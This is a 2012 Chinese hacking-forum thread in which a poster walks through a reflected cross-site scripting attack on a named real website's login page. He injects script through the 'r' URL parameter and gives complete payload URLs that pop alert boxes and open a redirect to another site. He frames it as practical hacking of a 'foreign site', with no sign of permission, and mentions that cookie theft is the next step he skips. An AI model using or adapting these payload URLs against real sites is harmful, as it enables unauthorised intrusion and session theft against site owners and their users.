开启左侧

国外站登陆口跨站实战

[复制链接]
发表于 2012-2-9 10:48:12 | 显示全部楼层 |阅读模式
国外站登陆口跨站实战 by:bingfeng QQ:466196038



地址:

http://www.litecast.com/x0Main/Login.asp?w=1600&r=


大家看到没有!直接像一个弹出对话框的形式一样

http://www.litecast.com/x0Main/Login.asp?w=1600&r=

那么这段地址也是一样的试试

当访问这里的是后直接弹出了,那么可能就会触发一个跨站了

我们如何让他触发,我们想想,随便解析看看

无论输入什么都会弹出,证明是90%可以跨站了

写入!!

<scripr>alert("")</script> 基本跨站代码

当我们写入的是后看看上面这里!爆出了一些信息,再看看源代码

window.location = "<scripr>alert("")</script>" ;

接下来,我们分析下这个 window.location后面这里,已经执行了这段代码

那么我们让他写入1看看

但没有反应,思路就断了?怎么办,再写入一个,意思因为他每次一执行这个就会弹出。

那么我们依次去执行2段我们刚刚的代码,试试

试试,加入QQ:466196038

alert("1")

看到没1出来了,却出现在这里


看我的

http://www.litecast.com/x0Main/Login.asp?w=1600&r=..../<script>alert("1")</script><scripr>alert("466196038")</script>/<script>alert("1")</script>

这样的意思很明显了,我们直接可以写入2段代码填补他的代码执行!


OK!接下来,我就不测试那个所谓的COOKIE了

直接跳百度看看就OK啦


http://www.litecast.com/x0Main/Login.asp?w=1600&r=..../<script>alert("")</script><script>window.open("http://baidu.com")</script> 跳百度

http://www.litecast.com/x0Main/Login.asp?w=1600&r=..../<script>alert("")</script><script>alert("hacker")</script> 跨站

再见!
平度网:www.pingdu.co 平度论坛:bbs.pingdu.co
 楼主| 发表于 2012-2-9 10:48:14 | 显示全部楼层
附件: 你需要登录才可以下载或查看附件。没有帐号?注册
平度网:www.pingdu.co 平度论坛:bbs.pingdu.co
发表于 2012-2-9 10:48:15 | 显示全部楼层
shocked.gif 这个是黑客。。。
平度网:www.pingdu.co 平度论坛:bbs.pingdu.co
发表于 2012-2-9 10:48:16 | 显示全部楼层
<script>alert("")</script><script跨站代码
平度网:www.pingdu.co 平度论坛:bbs.pingdu.co
您需要登录后才可以回帖 登录 | 会员注册

本版积分规则

 
QQ在线咨询
售前咨询热线
0532-88371356
售后服务微信
pingduwangzhan
快速回复 返回顶部 返回列表